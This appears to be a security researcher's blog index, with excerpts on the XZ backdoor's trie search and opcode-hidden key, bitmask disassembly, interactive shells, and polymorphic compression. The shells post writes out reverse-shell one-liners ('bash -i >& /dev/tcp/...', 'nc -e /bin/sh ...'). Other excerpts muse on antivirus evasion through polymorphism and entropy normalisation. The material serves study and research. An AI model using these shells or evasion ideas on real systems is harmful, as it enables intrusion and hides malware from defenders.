Saturday, April 19, 2025

XZ backdoor: strings, tries and automata

One of the interesting features of the XZ backdoor is that it searches for strings using a trie. That same trie search is why it runs catastrophically slowly, which is what led to its discovery. But we were taught that tries are supposed to make search fast. How do bitmap tries work, and how can search be made fast?
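As a rough illustration of the idea, here is a minimal bitmap trie sketch. Each node keeps a bitmap of the bytes that have a child and packs its children into a dense list, and the index of a child is the number of set bits below its byte (a popcount). The names `Node`, `insert` and `lookup` are made up for this sketch, and the layout is an assumption for illustration, not the backdoor's actual structure.

```python
class Node:
    def __init__(self):
        self.bitmap = 0      # bit c is set if a child exists for byte c
        self.children = []   # children packed densely, in ascending byte order
        self.value = None    # payload stored where a key ends

    def _slot(self, c):
        # Popcount of the bits below c = position of c's child in the packed list.
        return bin(self.bitmap & ((1 << c) - 1)).count("1")

    def child(self, c):
        if not (self.bitmap >> c) & 1:
            return None
        return self.children[self._slot(c)]

    def add_child(self, c):
        if not (self.bitmap >> c) & 1:
            self.children.insert(self._slot(c), Node())
            self.bitmap |= 1 << c
        return self.children[self._slot(c)]


def insert(root, key, value):
    node = root
    for c in key:            # iterating over bytes yields ints
        node = node.add_child(c)
    node.value = value


def lookup(root, key):
    node = root
    for c in key:
        node = node.child(c)
        if node is None:
            return None
    return node.value


root = Node()
insert(root, b"ssh-rsa", 1)
insert(root, b"ssh-dss", 2)
print(lookup(root, b"ssh-rsa"), lookup(root, b"ssh-ed25519"))
```

A lookup costs one bit test and one popcount per input byte, so the structure itself is cheap to walk. How the search is driven over the input is a separate question.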

Sunday, April 13, 2025

XZ backdoor: hiding the key in opcodes

The XZ backdoor uses many interesting techniques, some well known and some not. When I was reading Kaspersky's analysis, I was intrigued by the steganographic function that reconstructs the author's public key (required for signature verification) from the compiled code. The set of instructions in which the key is hidden (ADD, OR, ADC, SBB, AND, SUB, XOR, CMP and MOV) looked familiar to me. The Mistfall viruses (and, as a tribute to Mistfall, Lacrimae) use invariants of these opcodes for mutation.

Let's try to store something in the opcodes.
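One way to picture it, as a sketch only: in their register-to-register forms these instructions have two equivalent encodings, selected by the direction bit (bit 1) of the opcode, with the reg and r/m fields of the ModRM byte swapped. For example, `add eax, ebx` can be encoded as `01 D8` or `03 C3`. Choosing one or the other stores one bit per instruction. The helpers `set_direction`, `embed` and `extract` are hypothetical names, the code handles only 2-byte 32-bit forms, and it is not claimed to be the scheme used by the backdoor or by Mistfall.

```python
# "op r/m32, r32" opcodes; setting bit 1 (0x02) gives the "op r32, r/m32" form.
BASE_OPCODES = {
    0x01: "add", 0x09: "or", 0x11: "adc", 0x19: "sbb",
    0x21: "and", 0x29: "sub", 0x31: "xor", 0x39: "cmp", 0x89: "mov",
}


def set_direction(insn, bit):
    """Re-encode a 2-byte reg,reg instruction so its direction bit equals `bit`."""
    opcode, modrm = insn
    if (opcode & ~0x02) not in BASE_OPCODES or modrm >> 6 != 0b11:
        raise ValueError("not a supported reg,reg instruction")
    if (opcode >> 1) & 1 != bit:
        reg, rm = (modrm >> 3) & 7, modrm & 7
        opcode ^= 0x02                      # flip the direction bit
        modrm = 0xC0 | (rm << 3) | reg      # swap operands to keep the meaning
    return bytes([opcode, modrm])


def embed(instructions, bits):
    """Hide one bit in each instruction of a toy code sequence."""
    return b"".join(set_direction(i, b) for i, b in zip(instructions, bits))


def extract(code):
    """Read the hidden bits back (assumes only 2-byte reg,reg instructions)."""
    return [(code[i] >> 1) & 1 for i in range(0, len(code), 2)]


code = [b"\x01\xd8", b"\x31\xc9", b"\x89\xd8"]  # add eax,ebx; xor ecx,ecx; mov eax,ebx
hidden = embed(code, [1, 0, 1])
print(hidden.hex(), extract(hidden))
```

The re-encoded instructions behave identically when executed, which is what makes the direction bit usable both for mutation and for carrying data.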

Monday, April 7, 2025

Disassembly, bitmasks and boolean logic

A long time ago, I read an article by Z0mbie about disassembling and bit masks. Since many instruction encodings have regularities, table lookups can be replaced with a simple logical formula. For example, before disassembling an instruction, we need to check for segment register prefixes (this refers to 32-bit code). Their codes, in hex, are 26 (ES), 2E (CS), 36 (SS), 3E (DS), 64 (FS) and 65 (GS). Z0mbie pointed out that six comparisons can be replaced with two comparisons using a bit mask:

    and     al, 11111110b   ; 64/65
    cmp     al, 01100100b
    je      __prefix_seg
    ...
    and     al, 11100111b   ; 26/2E/36/3E
    cmp     al, 00100110b
    je      __prefix_seg
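A quick brute-force check of the two masks, written as a sketch: it applies each mask to the original byte value (the assembly modifies al, so the byte would have to be reloaded between the two tests) and confirms that exactly the six prefix bytes match. The name `is_seg_prefix` is made up for this example.

```python
SEG_PREFIXES = {0x26, 0x2E, 0x36, 0x3E, 0x64, 0x65}


def is_seg_prefix(b):
    # First test covers 64/65, second covers 26/2E/36/3E.
    return (b & 0b11111110) == 0b01100100 or (b & 0b11100111) == 0b00100110


matched = {b for b in range(256) if is_seg_prefix(b)}
print(sorted(hex(b) for b in matched))
```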

Is it possible to completely get rid of the tables and replace them with a logical formula?

Friday, April 4, 2025

Interactive shells and port-knocking

One of the first steps after a system has been compromised is to get shell access on the target. Hackers typically use the same one-liners to connect to the system:

    bash -i >& /dev/tcp/1.2.3.4/8080 0>&1 # or
    nc -e /bin/sh 1.2.3.4 8080

A dumb shell has many drawbacks: lost sessions linger in the process list, you can't edit a mistyped command, and unless HISTFILE has been unset, all of the hacker's activity ends up in the shell history, which later has to be cleaned from the same basic shell, without the ability to launch a proper text editor. Classic tricks, such as turning the shell into an interactive one, help to some extent:

    python -c 'import pty; pty.spawn("/bin/bash")'

Utilities like socat are another option. Phineas Fisher suggested a cool method: spawn a shell via netcat, move it to the background (Ctrl-Z), switch the local terminal to raw mode with stty raw -echo, and then return to the shell with fg. However, there's still a risk of making mistakes. Why not write a full-fledged shell of your own? What happens when we call pty.spawn() and stty?
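For the stty half of that question, the sketch below approximates what `stty raw -echo` does to the terminal through the termios interface: it switches off echo, line buffering, signal keys and output post-processing, so every keystroke is passed through untouched. It follows the same idea as Python's `tty.setraw()`, and the exact set of flags that stty changes is wider than shown here. The names `make_raw` and `enter_raw` are made up for this example.

```python
import termios


def make_raw(attrs):
    """Return a raw-mode copy of a termios.tcgetattr() attribute list."""
    iflag, oflag, cflag, lflag, ispeed, ospeed, cc = attrs
    # No CR->NL translation, no parity checks, no XON/XOFF flow control.
    iflag &= ~(termios.BRKINT | termios.ICRNL | termios.INPCK
               | termios.ISTRIP | termios.IXON)
    # No output post-processing (e.g. NL->CRNL).
    oflag &= ~termios.OPOST
    # 8-bit characters, no parity.
    cflag &= ~(termios.CSIZE | termios.PARENB)
    cflag |= termios.CS8
    # No echo, no line editing, no Ctrl-C/Ctrl-Z signal generation.
    lflag &= ~(termios.ECHO | termios.ICANON | termios.IEXTEN | termios.ISIG)
    cc = list(cc)
    cc[termios.VMIN] = 1    # read() returns as soon as one byte is available
    cc[termios.VTIME] = 0   # no read timeout
    return [iflag, oflag, cflag, lflag, ispeed, ospeed, cc]


def enter_raw(fd):
    """Put the terminal on `fd` into raw mode and return the saved settings."""
    saved = termios.tcgetattr(fd)
    termios.tcsetattr(fd, termios.TCSADRAIN, make_raw(saved))
    return saved  # pass back to termios.tcsetattr() to restore the terminal
```

With ISIG cleared, Ctrl-C is no longer turned into a signal locally. It travels as an ordinary byte to whatever is on the other end, which is why the session stops dying on an accidental interrupt.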

Wednesday, April 2, 2025

Compression, entropy and polymorphism

The Modexp blog has a great collection of compression algorithms from 8-bit computers, demos, and viruses. I noticed that most of them are variations on the Lempel-Ziv theme. This raised a few questions for me: Is it possible to make compression "polymorphic" so that it would be impossible to create a signature for the compressed data itself? And another question: Can the same algorithms be used for the opposite task — entropy normalization? (Compressed text has high entropy, and antivirus software often uses entropy as an indicator that the file is compressed and requires deeper analysis).
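To make the entropy remark concrete, here is a small sketch that computes the Shannon entropy of a byte string in bits per byte (0 for a constant string, 8 for uniformly distributed bytes) and compares a text with its zlib-compressed form. zlib stands in for the Lempel-Ziv family here and is my choice for the example, and `shannon_entropy` is a made-up name.

```python
import math
import zlib
from collections import Counter


def shannon_entropy(data):
    """Shannon entropy of a byte string, in bits per byte."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(k / n * math.log2(k / n) for k in Counter(data).values())


text = b"One of the interesting features of the backdoor is string searching. " * 50
packed = zlib.compress(text)
print(round(shannon_entropy(text), 2), round(shannon_entropy(packed), 2))
```

A scanner that uses entropy as a heuristic compares this kind of number against a threshold, which is the measurement that entropy normalization would try to push back down.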